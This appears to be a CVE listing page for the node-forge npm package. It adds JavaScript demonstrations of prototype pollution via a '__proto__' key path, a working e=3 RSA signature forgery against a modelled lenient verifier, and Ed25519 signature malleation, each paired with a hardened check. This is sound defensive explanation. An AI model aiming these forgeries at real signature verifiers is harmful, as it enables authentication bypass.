node-forge
npm | 9 known CVEs affecting this package
Aggregated from OSV, GitHub Security Advisories, NVD, and vendor advisories. Each CVE links to its full detail page with vendor advisories, patches, fixed versions, and remediation guidance.
CVEs affecting node-forge (page 1 of 1)
- CVE-2020-7720 | CRITICAL | CVSS 9.8 | EG 9.8 | Fixed in 0.10.0 | Published 2020-09-01
  The package node-forge before 0.10.0 is vulnerable to Prototype Pollution via the util.setPath function. Note: Version 0.10.0 is a breaking change removing the vulnerable functions.
- CVE-2022-0122 | MEDIUM | CVSS 6.1 | EG 6.1 | Fixed in 1.0.0 | Published 2022-01-06
  forge is vulnerable to URL Redirection to Untrusted Site
- CVE-2022-24771 | HIGH | CVSS 7.5 | EG 7.5 | Fixed in 1.3.0 | Published 2022-03-18
  Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allo…
- CVE-2022-24772 | HIGH | CVSS 7.5 | EG 7.5 | Fixed in 1.3.0 | Published 2022-03-18
  Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for trailing garbage bytes after decoding a `DigestInf…
- CVE-2022-24773 | MEDIUM | CVSS 5.3 | EG 5.3 | Fixed in 1.3.0 | Published 2022-03-18
  Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not properly check `DigestInfo` for a proper ASN.1 structure. T…
- CVE-2026-33891 | HIGH | CVSS 7.5 | EG 7.5 | Fixed in 1.4.0 | Published 2026-03-27
  Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteg…
- CVE-2026-33894 | HIGH | CVSS 7.5 | EG 7.5 | Fixed in 1.4.0 | Published 2026-03-27
  Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attacker…
- CVE-2026-33895 | HIGH | CVSS 7.5 | EG 7.5 | Fixed in 1.4.0 | Published 2026-03-27
  Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, Ed25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo …
- CVE-2026-33896 | HIGH | CVSS 7.4 | EG 7.4 | Fixed in 1.4.0 | Published 2026-03-27
  Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, `pki.verifyCertificateChain()` does not enforce RFC 5280 basicConstraints requirements when an intermediate cert…
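The prototype-pollution entry (CVE-2020-7720) names `util.setPath` but does not show why a deep-assignment helper is dangerous. The following is an added illustration written for this page, not node-forge's source: `setPathVulnerable` is a constructed helper with the same shape as a pre-0.10.0 path setter (walk the key list, create intermediates, assign at the end), and `setPathSafe` is a hardened variant that refuses prototype-chain keys and only descends into own properties. The key path `['__proto__', 'isAdmin']` and the `demonstratePollution` harness are assumptions made here for the demonstration.

```javascript
// Constructed model of a deep-assignment helper (NOT node-forge's code): walk
// `keys`, creating intermediate objects as needed, and assign `value` at the end.
function setPathVulnerable(object, keys, value) {
  if (typeof object !== 'object' || object === null) return;
  let i = 0;
  while (i < keys.length) {
    const next = keys[i++];
    if (i === keys.length) {
      object[next] = value;                       // final key: plain assignment
    } else {
      if (typeof object[next] !== 'object' || object[next] === null) {
        object[next] = {};                        // create a missing intermediate
      }
      object = object[next];                      // "__proto__" lands on Object.prototype
    }
  }
}

// Hardened variant: reject keys that reach the prototype chain and only
// descend through own properties, so an attacker-shaped key list cannot
// write into Object.prototype.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function setPathSafe(object, keys, value) {
  if (typeof object !== 'object' || object === null) return;
  if (!Array.isArray(keys) || keys.length === 0) return;
  for (const key of keys) {
    if (typeof key !== 'string' || FORBIDDEN_KEYS.has(key)) {
      throw new TypeError(`refusing to set a path through key "${String(key)}"`);
    }
  }
  let cur = object;
  for (let i = 0; i < keys.length - 1; i++) {
    const next = keys[i];
    const own = Object.prototype.hasOwnProperty.call(cur, next);
    if (!own || typeof cur[next] !== 'object' || cur[next] === null) {
      cur[next] = {};                             // never reuse an inherited value
    }
    cur = cur[next];
  }
  cur[keys[keys.length - 1]] = value;
}

// Runs an attacker-controlled key path (assumed for this demo) against an
// empty object and reports whether an unrelated object was affected.
// Returns { threw, leaked }: `leaked` is true only if Object.prototype was polluted.
function demonstratePollution(setPath) {
  const target = {};
  const unrelated = {};
  let threw = false;
  try {
    setPath(target, ['__proto__', 'isAdmin'], true);
  } catch (e) {
    threw = true;
  }
  const leaked = unrelated.isAdmin === true;
  delete Object.prototype.isAdmin;                // clean up so later code is unaffected
  return { threw, leaked };
}
```

The practical check when auditing similar helpers is the same one `setPathSafe` performs: every segment of a path that comes from untrusted input (JSON bodies, query strings, config merges) must be rejected if it is `__proto__`, `constructor` or `prototype`, and traversal must use own-property lookups rather than plain indexing.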
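The three 2022 RSA entries (CVE-2022-24771, -24772, -24773) and CVE-2026-33894 all describe the same class of weakness: a PKCS#1 v1.5 verifier that parses the decoded block instead of reconstructing it byte for byte, which with a low public exponent lets anyone forge a signature without the private key (Bleichenbacher's 2006 attack). The example below is added here and is not node-forge's code. It models a lenient verifier that ignores trailing bytes after `DigestInfo`, the strict RFC 8017 verifier, and the cube-root forgery against the lenient one, using only Node's built-in `crypto` and `BigInt`. The key size, the e=3 key generated on the fly, the sample message and the helper names are assumptions made for the demonstration.

```javascript
const crypto = require('crypto');

// DER prefix of DigestInfo for SHA-256 (RFC 8017 section 9.2, note 1).
const SHA256_DIGESTINFO_PREFIX = Buffer.from('3031300d060960864801650304020105000420', 'hex');

const bufToBig = (b) => BigInt('0x' + b.toString('hex'));
const bigToBuf = (x, len) => Buffer.from(x.toString(16).padStart(len * 2, '0'), 'hex');
const sha256 = (msg) => crypto.createHash('sha256').update(msg).digest();
const byteLen = (n) => (n.toString(2).length + 7) >> 3;

// Floor of the integer cube root, by bisection over BigInt.
function icbrt(n) {
  let lo = 0n, hi = 1n << BigInt(Math.ceil(n.toString(2).length / 3) + 1);
  while (lo < hi) {
    const mid = (lo + hi + 1n) >> 1n;
    if (mid * mid * mid <= n) lo = mid; else hi = mid - 1n;
  }
  return lo;
}

// Assumption for the demo: a fresh 2048-bit RSA key with public exponent 3.
function makeE3Key(bits = 2048) {
  const { publicKey, privateKey } = crypto.generateKeyPairSync('rsa', { modulusLength: bits, publicExponent: 3 });
  const jwk = publicKey.export({ format: 'jwk' });
  const nBytes = Buffer.from(jwk.n.replace(/-/g, '+').replace(/_/g, '/'), 'base64');
  return { publicKey, privateKey, n: bufToBig(nBytes) };
}

// EM = s^3 mod n, left-padded to the modulus length (e = 3, so a plain cube).
function recoverEM(n, sig) {
  const s = bufToBig(sig);
  if (s >= n) return null;
  return bigToBuf((s * s * s) % n, byteLen(n));
}

// Model of the weakness described in the advisories (not forge's code): accept the
// 00 01 FF..FF 00 framing, compare only the leading DigestInfo||hash bytes, and
// never look at whatever follows them.
function verifyLenient(n, sig, msg) {
  const em = recoverEM(n, sig);
  if (!em || em[0] !== 0x00 || em[1] !== 0x01) return false;
  let i = 2;
  while (i < em.length && em[i] === 0xff) i++;
  if (i - 2 < 8 || i >= em.length || em[i] !== 0x00) return false;
  i++;
  const t = Buffer.concat([SHA256_DIGESTINFO_PREFIX, sha256(msg)]);
  return em.subarray(i, i + t.length).equals(t);   // trailing bytes are ignored
}

// RFC 8017 section 8.2.2: rebuild the whole EM and compare every byte, which
// forces the padding length and leaves no room for trailing bytes.
function verifyStrict(n, sig, msg) {
  const em = recoverEM(n, sig);
  if (!em) return false;
  const t = Buffer.concat([SHA256_DIGESTINFO_PREFIX, sha256(msg)]);
  const psLen = em.length - t.length - 3;
  if (psLen < 8) return false;
  const expected = Buffer.concat([Buffer.from([0x00, 0x01]), Buffer.alloc(psLen, 0xff), Buffer.from([0x00]), t]);
  return crypto.timingSafeEqual(em, expected);
}

// Forgery against the lenient verifier: pick EM' = 00 01 FF*8 00 || T || zeros,
// take s = ceil(cbrt(EM')). With e = 3 the difference s^3 - EM' is below 3*s^2,
// far smaller than the zero region, so s^3 still starts with the required bytes.
function forgeSignature(n, msg) {
  const k = byteLen(n);
  const t = Buffer.concat([SHA256_DIGESTINFO_PREFIX, sha256(msg)]);
  const head = Buffer.concat([Buffer.from([0x00, 0x01]), Buffer.alloc(8, 0xff), Buffer.from([0x00]), t]);
  const target = bufToBig(head) << BigInt(8 * (k - head.length));
  let s = icbrt(target);
  if (s * s * s < target) s += 1n;               // round up so that s^3 >= target
  return bigToBuf(s, k);
}

// Runs a genuine signature and a forgery through all three verifiers.
function demo() {
  const { publicKey, privateKey, n } = makeE3Key();
  const msg = Buffer.from('constructed sample message');   // constructed input
  const real = crypto.sign('sha256', msg, privateKey);
  const forged = forgeSignature(n, msg);
  return {
    realLenient: verifyLenient(n, real, msg),
    realStrict: verifyStrict(n, real, msg),
    realNode: crypto.verify('sha256', msg, publicKey, real),
    forgedLenient: verifyLenient(n, forged, msg),
    forgedStrict: verifyStrict(n, forged, msg),
    forgedNode: crypto.verify('sha256', msg, publicKey, forged),
  };
}
```

The forgery needs nothing but the public modulus, which is why an e=3 key turns a "lenient parsing" bug into a full signature bypass. The fix shape is the one in `verifyStrict`: never parse the recovered block, reconstruct it and compare the whole thing.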
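CVE-2026-33895 concerns Ed25519 signatures whose scalar S is not reduced modulo the group order L. RFC 8032 section 5.1.7 requires a verifier to reject any S that is not below L; a verifier that skips this accepts S + L as a second valid signature for the same message, since L times the base point is the identity. The example below is added here and is not node-forge's code: it implements the canonical-S check, builds the malleated twin of a genuine signature, and uses Node's built-in `crypto` (OpenSSL, which performs this check itself) as the reference verifier. The key, message and helper names are assumptions made for the demonstration.

```javascript
const crypto = require('crypto');

// Ed25519 group order L (RFC 8032 section 5.1).
const L = 2n ** 252n + 27742317777372353535851937790883648493n;

const leToBig = (b) => BigInt('0x' + Buffer.from(b).reverse().toString('hex'));
const bigToLE = (x, len) => Buffer.from(x.toString(16).padStart(len * 2, '0'), 'hex').reverse();

// RFC 8032 section 5.1.7 step 1: S (last 32 bytes, little-endian) must be < L.
function hasCanonicalS(sig) {
  return sig.length === 64 && leToBig(sig.subarray(32)) < L;
}

// Malleated twin of a valid signature: same R, S' = S + L (still fits in 32 bytes).
// A verifier that never checks S < L accepts it because S'*B == S*B.
function malleate(sig) {
  const sPrime = leToBig(sig.subarray(32)) + L;
  return Buffer.concat([sig.subarray(0, 32), bigToLE(sPrime, 32)]);
}

// Reference verifier; treats a thrown error as a failed verification.
function nodeVerify(publicKey, msg, sig) {
  try { return crypto.verify(null, msg, publicKey, sig); } catch (e) { return false; }
}

// Wrapper that enforces the canonical-S check in front of any implementation.
function verifyCanonical(publicKey, msg, sig) {
  return hasCanonicalS(sig) && nodeVerify(publicKey, msg, sig);
}

function demo() {
  const { publicKey, privateKey } = crypto.generateKeyPairSync('ed25519');
  const msg = Buffer.from('constructed sample message');   // constructed input
  const sig = crypto.sign(null, msg, privateKey);
  const bad = malleate(sig);
  return {
    sameR: sig.subarray(0, 32).equals(bad.subarray(0, 32)),
    sigCanonical: hasCanonicalS(sig),
    badCanonical: hasCanonicalS(bad),
    sigNode: nodeVerify(publicKey, msg, sig),
    badNode: nodeVerify(publicKey, msg, bad),
    sigWrapped: verifyCanonical(publicKey, msg, sig),
    badWrapped: verifyCanonical(publicKey, msg, bad),
  };
}
```

When a protocol uses a signature as an identifier (transaction hashes, deduplication keys, replay caches), a verifier without this check lets an attacker mint distinct-looking but equally valid signatures, which is why the advisory rates it as a forgery rather than a cosmetic issue.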